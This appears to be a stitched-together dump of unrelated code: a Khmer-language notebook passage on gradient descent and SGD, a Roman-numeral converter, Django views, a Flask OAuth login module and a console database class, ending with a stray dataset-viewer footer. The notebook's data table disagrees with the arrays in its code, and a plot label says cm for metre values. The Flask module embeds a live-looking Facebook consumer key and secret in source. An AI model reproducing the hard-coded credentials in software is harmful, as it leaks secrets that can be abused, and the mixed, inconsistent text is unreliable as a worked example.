# E\left(\pmb{\beta}\right)=\sum_{i=1}^{N}\epsilon_i^2=\left(\pmb{y}-X\pmb{\beta}\right)^\top\left(\pmb{y}-X\pmb{\beta}\right)
# $$
#
# អនុគមន៍ដេរីវេ(gradient)របស់វាគឺ
#
# $$
# E\left(\pmb{\beta}\right)=\left(\pmb{y}-X\pmb{\beta}\right)^\top\left(\pmb{y}-X\pmb{\beta}\right)=\pmb{y}^\top\pmb{y}-2\pmb{y}^\top X\pmb{\beta}+\pmb{\beta}^\top X^\top X\pmb{\beta}
# $$
#
# $$
# \frac{\partial}{\partial\pmb{\beta}}E\left(\pmb{\beta}\right)=-2X^\top\pmb{y}-2X^\top X\pmb{\beta}=2X^\top\left(X\pmb{\beta}-\pmb{y}\right)=2X^\top\left(\hat{\pmb{y}}-\pmb{y}\right)
# $$
#
# ហេតុនេះ កន្សោមសម្រាប់ការផ្លាស់ប្តូរតម្លៃអថេរគឺ
#
# $$
# \pmb{\beta}^{\left(t+1\right)}=\pmb{\beta}^{\left(t\right)}-\eta_t\left.\frac{\partial E\left(\pmb{\beta}\right)}{\partial\pmb{\beta}}\right|_{\pmb{\beta}=\pmb{\beta}^{\left(\pmb{t}\right)}}
# $$
#
# $$\pmb{\beta}^{\left(t+1\right)}=\pmb{\beta}^{\left(t\right)}-2\eta_tX^\top\left({\hat{\pmb{y}}}^{\left(t\right)}-\pmb{y}\right)\ \ $$
#
# ដែល$\hat{\pmb{y}}^{\left(t\right)}=X\pmb{\beta}^{\left(t\right)}$។
#
# យើងសាកល្បងគណនាតម្លៃប្រហែលនៃមេគុណតម្រែតម្រង់ដែលបានសិក្សាក្នុងអត្ថបទមុនដោយប្រើ gradient descent។ លើកនេះយើងយកតម្លៃកម្ពស់គិតជាម៉ែត្រដើម្បីបង្រួមតម្លៃលេខ។
#
# | <br>កម្ពស់(m) | <br>1.52 | <br>1.57 | <br>1.60 | <br>1.63 | <br>1.50 | <br>1.47 | <br>1.65 | <br>1.68 | <br>1.78 |
# |- |- |- |- |- |- |- |- |- |- |
# | <br>ម៉ាស(kg) | <br>54.48 | <br>55.84 | <br>57.20 | <br>58.57 | <br>53.12 | <br>52.21 | <br>59.93 | <br>61.29 | <br>69.92 |
# In[5]:
# Observations: heights (m) and masses (kg).
X = np.array([1.52,1.57,1.60,1.63,1.50,1.47,1.65,1.68,1.70])
y = np.array([54.48,55.84,57.20,56.57,53.12,52.21,59.93,61.29,67.92])
# Design matrix with a leading column of ones for the intercept term.
XP = np.vstack([np.ones_like(X), X]).T
beta = np.zeros(XP.shape[1])  # start from beta = 0
eta = 1e-3
# Full-batch gradient descent: beta <- beta - 2*eta * X^T (X beta - y).
for t in range(100000):
    y_hat = XP @ beta
    beta -= 2 * eta * XP.T @ (y_hat - y)
# In[6]:
def predict(x, w, k):
    """Evaluate a degree-k polynomial with coefficients w at the points x.

    Builds the Vandermonde-style design matrix [x**0, x**1, ..., x**k]
    column-wise and returns its product with the coefficient vector w.
    """
    design = np.vstack([x ** power for power in range(k + 1)]).T
    return design @ w
# Plot the gradient-descent fit over the observations.
xa = np.linspace(1.45,1.72,50)
plt.scatter(X,y,marker='x')
plt.plot(xa,predict(xa,beta,1),'r-')
# NOTE(review): the data above is in metres but the label says cm -- confirm.
plt.xlabel('height(cm)')
plt.ylabel('mass(kg)')
y_legend = "y="+str(round(beta[0],3))+"+"+str(round(beta[1],3))+"x"
plt.legend([y_legend,"observed-data"])
plt.title("Learning with Gradient Descent")
plt.show()
# ## Stochastic Gradient Descent
# ការធ្វើបរមាកម្មលើតម្លៃអនុគមន៍ដោយប្រើ Gradient Descent អាចជួយយើងឱ្យធ្វើការគណនា
# បានយ៉ាងមានប្រសិទ្ធភាពទោះបីជាវិមាត្រឬចំនួននៃអថេរពន្យល់ច្រើនក៏ដោយ។ ប៉ុន្តែក្នុងវិធីសាស្រ្ត Gradient Descent ការគណនា gradient ត្រូវបានធ្វើឡើងដោយប្រើប្រាស់ទិន្នន័យទាំងអស់ដែលមានក្នុងដៃ។ ក្នុងករណីដែលចំនួនទិន្នន័យមានច្រើន វិធីនេះត្រូវបានគេដឹងថាមានភាពយឺតយ៉ាវក្នុងការរួមទៅរកតម្លៃបរមារបស់អនុគមន៍។
#
# ដើម្បីដោះស្រាយបញ្ហានេះ Stochastic Gradient Descent (SGD) ត្រូវបានប្រើប្រាស់ជំនួសវិញ។ ក្នុងករណីចំនួនទិន្នន័យដែលមាន(N) មានបរិមាណច្រើន ក្នុងវិធីSGD ទិន្នន័យម្តងមួយៗ ត្រូវបានជ្រើសយកដោយចៃដន្យដើម្បីគណនា gradient នៃអនុគមន៍ រួចធ្វើការផ្លាស់ប្តូរតម្លៃអថេរតែម្តង ដោយមិនចាំបាច់ធ្វើការបូកសរុបគ្រប់ទិន្នន័យដែលមាននោះឡើយ។
#
# ជាទូទៅ ដើម្បីអនុវត្តSGDបាន ចំពោះទិន្នន័យសរុបDដែលមានអនុគមន៍ដែលត្រូវធ្វើបរមាកម្ម ត្រូវតែអាចសរសេរជាផលបូកនៃអនុគមន៍ដែលយកករណីទិន្នន័យនិមួយៗជាធាតុចូលដូចខាងក្រោម។
#
# $$
# E_D\left(\pmb{\beta}\right)=\sum_{\left(\pmb{x},y\right)\in D} e\left(\pmb{\beta}\right)
# $$
#
# ក្នុងករណីយើងកំពុងសិក្សានេះ ដោយសារ$E_D\left(\pmb{\beta}\right)$ត្រូវបានកំណត់ដោយផលបូកការេនៃកម្រិតលម្អៀងគ្រប់ទិន្នន័យទាំងអស់ $E_D\left(\pmb{\beta}\right)=\sum_{i=1}^{N}\epsilon_i^2$ ហេតុនេះ លក្ខខណ្ឌខាងលើត្រូវបានផ្ទៀងផ្ទាត់។
#
# ចំពោះទិន្នន័យនិមួយៗ$\left(\pmb{x}_i,y_i\right)$ gradient នៃអនុគមន៍ដែលត្រូវធ្វើបរមាកម្មអាចគណនាបានដូចខាងក្រោម។
#
# $$
# \frac{\partial e\left(\pmb{\beta}\right)}{\partial\pmb{\beta}}=\frac{\partial}{\partial\pmb{\beta}}\left(y_i-\pmb{x}_i^\top\pmb{\beta}\right)^2=-2\left(y_i-\pmb{x}_i^\top\pmb{\beta}\right)\pmb{x}_i^\top=2\left({\hat{y}}_i-y_i\right)\pmb{x}_i^\top
# $$
#
# កន្សោមសម្រាប់ធ្វើការផ្លាស់ប្តូរតម្លៃនៃអថេរតាម SGD គឺអាចបង្ហាញដូចទម្រង់ខាងក្រោម។
#
# $$
# \pmb{\beta}^{\left(t+1\right)}=\pmb{\beta}^{\left(t\right)}-\eta_t\left.\frac{\partial e\left(\pmb{\beta}\right)}{\partial\pmb{\beta}}\right|_{\pmb{\beta}=\pmb{\beta}^{\left(\pmb{t}\right)}}
# $$
#
# $$
# \pmb{\beta}^{\left(t+1\right)}=\pmb{\beta}^{\left(t\right)}-2\eta_t\left({{\hat{y}}_i}^{\left(t\right)}-y\right)\pmb{x}_i^\top
# \pmb{\beta}^{\left(t+1\right)}=\pmb{\beta}^{\left(t\right)}-2\eta_t\pmb{\delta}_\pmb{i}
# $$
#
# ដែល $\pmb{\delta}_\pmb{i}=\left({{\hat{y}}_i}^{\left(t\right)}-y\right)\pmb{x}_i^\top$។
#
# ជាមួយPythonអ្នកអាចសរសេរCodeដូចខាងក្រោម។
# នៅទីនេះយើងកំណត់យកតម្លៃចាប់ផ្តើមនៃ $\pmb{\beta}^{\left(0\right)}=\mathbf{0}\ $ និង $\eta=0.001$
# In[7]:
import random
# Stochastic gradient descent: shuffle the sample order each epoch and
# update beta from one observation at a time.
beta = np.zeros(2)
d_index = list(range(len(X)))
eta = 1e-3
for t in range(100000):
    random.shuffle(d_index)
    for i in d_index :
        # 1x2 design row [1, x_i] for the single sampled observation.
        XP = np.vstack([np.ones_like(X[i]), X[i]]).T
        y_hat = XP @ beta
        beta -= 2 * eta * XP.T @ (y_hat - y[i])
# In[17]:
# Plot the SGD fit over the observations (same view as the GD cell above).
xa = np.linspace(1.45,1.72,50)
plt.scatter(X,y,marker='x')
plt.plot(xa,predict(xa,beta,1),'r-')
plt.xlabel('height(cm)')
plt.ylabel('mass(kg)')
y_legend = "y="+str(round(beta[0],3))+"+"+str(round(beta[1],3))+"x"
plt.legend([y_legend,"observed-data"])
# FIX: this cell plots the *stochastic* gradient descent result; the title
# was copied from the GD cell and mislabelled the figure.
plt.title("Learning with Stochastic Gradient Descent")
plt.show()
# បើយើងធ្វើការប្រៀបធៀបរវាង Gradient Descent និង SGD យើងអាចនិយាយបានថា SGD គឺជាវិធីសាស្រ្តដែលសន្មតយកតម្លៃ gradient ចំពោះគ្រប់ទិន្នន័យទាំងអស់ក្នុង Gradient Descent ដោយតម្លៃប្រហែល
# $\pmb{\delta}_\pmb{i}=\left({{\hat{y}}_i}^{\left(t\right)}-y\right)\pmb{x}_i^\top\ $ ពោលគឺ $ \frac{\partial E_D\left(\pmb{\beta}\right)}{\partial\pmb{\beta}}\approx\frac{\partial e_{\pmb{x}_i,y_i}\left(\pmb{\beta}\right)}{\partial\pmb{\beta}}=\pmb{\delta}_\pmb{i}$។
# In[ ]:
|
def solution(n):
    """Convert a non-negative integer (intended range 1..3999) to a Roman numeral.

    Replaces the original cascade of seven while/break loops with the
    standard greedy algorithm over a value->numeral table, which also covers
    the subtractive forms (CM, CD, XC, XL, IX, IV).  Returns '' for n == 0,
    matching the original behaviour.
    """
    numerals = [
        (1000, "M"), (900, "CM"), (500, "D"), (400, "CD"),
        (100, "C"), (90, "XC"), (50, "L"), (40, "XL"),
        (10, "X"), (9, "IX"), (5, "V"), (4, "IV"), (1, "I"),
    ]
    parts = []
    for value, numeral in numerals:
        # Greedily take as many of the largest remaining symbol as fit.
        while n >= value:
            parts.append(numeral)
            n -= value
    return "".join(parts)
print(solution(92))  # demo: prints "XCII"
"""
"M":1000,"CM":900,"D":500,"CD":400,"C":100,"XC":90,"L":50,"XL":40,"X":10,"V":5,"IV":4,"I":1
Symbol Value
I 1
V 5
X 10
L 50
C 100
D 500
M 1,000
""" |
from django.shortcuts import render,render_to_response
from django.template import RequestContext
from django.http import HttpResponseRedirect
from jobs.forms import QuoteForm
from jobs.models import UserProfile
#import sendgrid
import sys
# Create your views here.
def home(request):
    """Render the landing page."""
    return render_to_response("jobs/home.html", RequestContext(request))
def contact(request):
    """Render the static contact page."""
    return render_to_response("static/contact.html", RequestContext(request))
def faq(request):
    """Render the static FAQ page."""
    return render_to_response("static/faq.html", RequestContext(request))
def terms(request):
    """Render the static terms-of-service page."""
    return render_to_response("static/terms.html", RequestContext(request))
def privacy(request):
    """Render the static privacy-policy page."""
    return render_to_response("static/privacy.html", RequestContext(request))
def team(request):
    """Render the static team page."""
    return render_to_response("static/team.html", RequestContext(request))
def about(request):
    """Render the static about page."""
    return render_to_response("static/about.html", RequestContext(request))
def success(request):
    """Render the page shown after a successful quote submission."""
    return render_to_response("static/success.html", RequestContext(request))
def quoteForm(request):
    """Display and process the quote-request form.

    GET: pre-fill location/photography_type from the query string.
    POST: bind the form to the posted data (with the logged-in user's id
    injected) and save it, redirecting to /success/ on success.
    Python 2 file: `print >> sys.stderr` writes debug output to stderr.
    """
    if request.method == 'POST':
        # NOTE(review): assumes request.user is authenticated and has a
        # UserProfile; .get() raises DoesNotExist otherwise -- confirm callers.
        userprofile = UserProfile.objects.get(user=request.user)
        post_values = request.POST.copy()
        # Inject the submitting user's id so the form's 'user' field validates.
        post_values['user'] = userprofile.user.id
        form = QuoteForm(post_values)
        print >> sys.stderr, form.is_valid()
        if form.is_valid():
            # sg = sendgrid.SendGridClient('insert_user_here', 'insert_pass_here')
            # message = sendgrid.Mail()
            # message.add_to('HF <mail@hirefellas.com>')
            # message.set_subject('Quote Request')
            # userid = userprofile.user.username
            # message.set_text("You've a new quote request from " + userid)
            # message.set_from('Pranav Prabhakar <mail@hirefellas.com>')
            # status, msg = sg.send(message)
            form.save()
            return HttpResponseRedirect('/success/')
        else:
            print >> sys.stderr, form.errors
    else:
        # GET: blank form pre-filled from optional query-string parameters.
        form = QuoteForm()
        location = request.GET.get('location', '')
        #event_type = request.GET.get('event_type', '')
        photography_type = request.GET.get('photography_type', '')
        form.fields["location"].initial = location
        #form.fields["event_type"].initial = event_type
        form.fields["photography_type"].initial = photography_type
        print >> sys.stderr, photography_type
    return render(request, 'jobs/quote3.html', {'form': form})
|
import json
import os
import urllib2,urllib
from flask import Module
from flask import redirect,request,session,url_for
from flask.ext.oauth import OAuth
from db import Database
from util import *
# Flask module (old-style blueprint) holding all login/logout routes.
login = Module(__name__)
oauth = OAuth()
# SECURITY(review): the OAuth consumer key/secret are hard-coded in source;
# they should be loaded from configuration/environment, not committed.
facebook = oauth.remote_app('facebook',
    base_url='https://graph.facebook.com/',
    request_token_url=None,
    access_token_url='/oauth/access_token',
    authorize_url='https://www.facebook.com/dialog/oauth',
    consumer_key="178485798938752",
    consumer_secret="3fc3c9f171bbb5221403307113662fe5",
    request_token_params={'scope': 'email,user_likes,friends_likes,user_location'}
)
def cookieUser(email, extra_data=None):
    """Log a user in by e-mail: reconcile/create their record and cache it in the session.

    Reconciles three identity sources:
      * an existing record found by e-mail,
      * an existing record found by the session's voterID (if any),
      * neither (a brand-new user is created).

    Side effects: may save to Database.users and always sets session['userObj'].
    """
    if extra_data is None:
        extra_data = dict()

    def saveAndSet(_userObj):
        # Persist, then stringify the Mongo ObjectId so the object is
        # session/JSON safe.
        # NOTE(review): a later re-save of the same dict would write the
        # stringified _id back -- confirm Database.users.save tolerates that.
        Database.users.save(_userObj)
        _userObj['_id'] = str(_userObj['_id'])
        session['userObj'] = _userObj

    # TODO: Find out why session['userObj'] sometimes persists after logout.
    # Look for existing userObjs for this e-mail or the session's voterID.
    emailUserObj = Database.getUserByEmail(email)
    voterIDUserObj = Database.getUserByVoterID(session['voterID']) if session.get('voterID') else None
    # BUGFIX: the original stringified emailUserObj['_id'] unconditionally,
    # which raised TypeError whenever no user existed for this e-mail
    # (the branches below explicitly handle emailUserObj being falsy).
    if emailUserObj:
        emailUserObj['_id'] = str(emailUserObj['_id'])
    if voterIDUserObj:
        if emailUserObj:
            if emailUserObj.get('voter_uniqueid'):
                # E-mail record already linked to a voter -- just cache it.
                session['userObj'] = emailUserObj
            else:
                # Link the e-mail record to the session's voter and persist.
                emailUserObj['voter_uniqueid'] = session['voterID']
                saveAndSet(emailUserObj)
        else:
            # Only a voter record exists: attach the e-mail to it.
            voterIDUserObj['email'] = email
            saveAndSet(voterIDUserObj)
    elif emailUserObj:
        if not(emailUserObj.get('voter_uniqueid')) and session.get('voterID'):
            emailUserObj['voter_uniqueid'] = session.get('voterID')
            saveAndSet(emailUserObj)
        else:
            session['userObj'] = emailUserObj
    else:
        # No record at all: create one (extra_data carries name/source/etc.).
        session['userObj'] = Database.createUserObj(voterID=session.get('voterID'), email=email, extra_data=extra_data)
@login.route('/login/facebook/')
def handle_facebook():
    """Start the Facebook OAuth flow; Facebook redirects back to facebook_authorized."""
    return facebook.authorize(callback=url_for('facebook_authorized',
        next=request.args.get('next') or request.referrer or None,
        _external=True))
@login.route('/login/facebook_authorized/')
@facebook.authorized_handler
def facebook_authorized(resp):
    """OAuth callback: store the token, fetch the profile, and log the user in."""
    # resp is None when the user denied the authorization request.
    if resp is None:
        return 'Access denied: reason=%s error=%s' % (
            request.args['error_reason'],
            request.args['error_description']
        )
    session['oauth_token'] = (resp['access_token'], '')
    me = facebook.get('/me')
    if me.data.get('error'):
        return 'Could not call Facebook.'
    # Profile fields cached onto the user record by cookieUser().
    userObjData = {
        'name': me.data['name'],
        'email': me.data['email'],
        'source': 'facebook',
        'facebook_id': me.data['id']
    }
    cookieUser(me.data['email'],userObjData)
    # if session.get('voterID'): associateEmailWithVoterID(me.data['email'],session.get('voterID'))
    return redirect(request.args.get('next') or '/')
@login.route("/login/browserid/",methods=['POST'])
def handle_browserid():
    """Verify a Mozilla BrowserID (Persona) assertion and log the user in.

    Returns a JSON payload: {'success': bool, ...} with 'next' on success.
    """
    data = {
        "assertion" : request.form.get('assertion'),
        "audience" : urllib2.Request(request.url).get_host()
    }
    nextURL = request.args.get('next') or '/'
    # Server-side verification of the assertion against browserid.org.
    req = urllib2.Request('https://browserid.org/verify',urllib.urlencode(data))
    json_result = urllib2.urlopen(req).read()
    # Parse the JSON to extract the e-mail
    result = json.loads(json_result)
    if result.get('status') == 'failure':
        return jsonifyResponse({
            'success': False,
            'error': True,
            'error_description': 'BrowserID assertion check failed!'
        })
    userObjData = {
        'source': 'browserid',
    }
    cookieUser(result.get('email'),userObjData)
    # if session.get('voterID'): associateEmailWithVoterID(result.get('email'),session.get('voterID'))
    # upsertUser(result.get('email'))
    return jsonifyResponse({
        'success': True,
        'next': nextURL
    })
@facebook.tokengetter
def get_facebook_oauth_token():
    """Supply the session's stored OAuth token to the facebook client for API calls."""
    return session.get('oauth_token')
@login.route("/login/")
def signin():
    """Render the login page; already-authenticated users are bounced home."""
    if getLoggedInUser() is not None:
        return redirect("/")
    # Both provider links carry the post-login destination through ?next=.
    fbLoginLink = url_for('login.handle_facebook',next=request.args.get('next') or '/')
    browserIDLoginLink = url_for('login.handle_browserid',next=request.args.get('next') or '/')
    return auto_template('login.html',fb_login_link=fbLoginLink,browserid_login_link=browserIDLoginLink)
@login.route("/logout/")
def logout():
    """Drop the cached user and voter ids from the session and redirect."""
    for key in ('userObj', 'voterID'):
        if session.get(key):
            del session[key]
    session.modified = True
    return redirect(request.args.get('next') or '/')
|
from db import dataBase as database
class incentive:
    """Console workflow for viewing and adding rows in dbo.Incentive.

    All public methods take an open DB-API cursor and interact with the
    operator via input()/print().  Errors are reported rather than raised so
    the calling menu loop keeps running.
    """

    def __init__(self):
        """Initialise placeholder fields for an incentive record."""
        self.incentiveId = ""
        self.incentiveAmount = ""
        self.incentiveDate = ""
        self.employeeId = ""
        self.employeeSalary = 0

    def _printIncentiveTable(self, rows, width):
        """Print incentive rows as a fixed-width table framed by `width` dashes."""
        dash = '-' * width
        print(dash)
        print('{:<5s}{:>30s}{:>30s}{:>30s}'.format("Id", "Incentive Amount", "Date", "Employee Id"))
        print(dash)
        for row in rows:
            print('{:<5s}{:>30s}{:>30s}{:>30s}'.format(str(row[0]), str(row[1]), row[2], row[3]))

    def _chooseEmployee(self, cursor):
        """Prompt for a (partial) name, list matching employees, return the chosen id.

        Returns None (after printing a notice) when no employee matches.
        """
        name = input("Enter name of employee. !")
        cursor.execute('SELECT * FROM dbo.Employee where employee_name like ?', ['%' + name + '%'])
        data = cursor.fetchall()
        if len(data) == 0:
            print("No employee found with that name.!")
            return None
        dash = '-' * 180
        print(dash)
        print('{:<5s}{:>30s}{:>30s}{:>30s}{:>30s}{:>30s}'.format("Id", "Name", "Designation", "DOB", "PPS",
                                                                 "Salary"))
        print(dash)
        for row in data:
            print(
                '{:<5s}{:>30s}{:>30s}{:>30s}{:>30s}{:>30s}'.format(str(row[0]), row[1], row[2], row[4], row[5], str(row[6])))
        return input("Enter employee id from above.!")

    def selectAllIncentive(self, cursor):
        """List incentives recorded within the last N days (N is prompted)."""
        try:
            days = int(input("Show data upto how many previous days?"))
            cursor.execute('SELECT * FROM dbo.Incentive where incentive_date <=CONVERT (date, GETDATE()) and incentive_date>CONVERT (date, GETDATE()-?)', days)
            data = cursor.fetchall()
            if len(data) != 0:
                self._printIncentiveTable(data, 100)
            else:
                print("No incentive record present for last %i days" % days)
        # FIX: was a bare `except:` which also swallowed SystemExit and
        # KeyboardInterrupt; narrowed to Exception (same for methods below).
        except Exception:
            print("Something went wrong.!! Contact the administrator.!")

    def selectBasedOnName(self, cursor):
        """Show all incentives for an employee picked by (partial) name."""
        try:
            empid = self._chooseEmployee(cursor)
            if empid is None:
                return
            cursor.execute("SELECT * FROM dbo.Incentive where employee_id=?", empid)
            data = cursor.fetchall()
            if len(data) != 0:
                self._printIncentiveTable(data, 180)
            else:
                print("No incentive found for the employee")
        except Exception:
            print("Something went wrong.!! Contact the administrator.!")

    def addIncentive(self, cursor):
        """Insert a new incentive row for an employee picked by (partial) name."""
        try:
            empid = self._chooseEmployee(cursor)
            if empid is None:
                return
            db = database()
            incentive_date = input("Enter incentive date")
            db.insertIncentive(empid, incentive_date)
        except Exception:
            print("Something went wrong.!! Contact the administrator.!")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.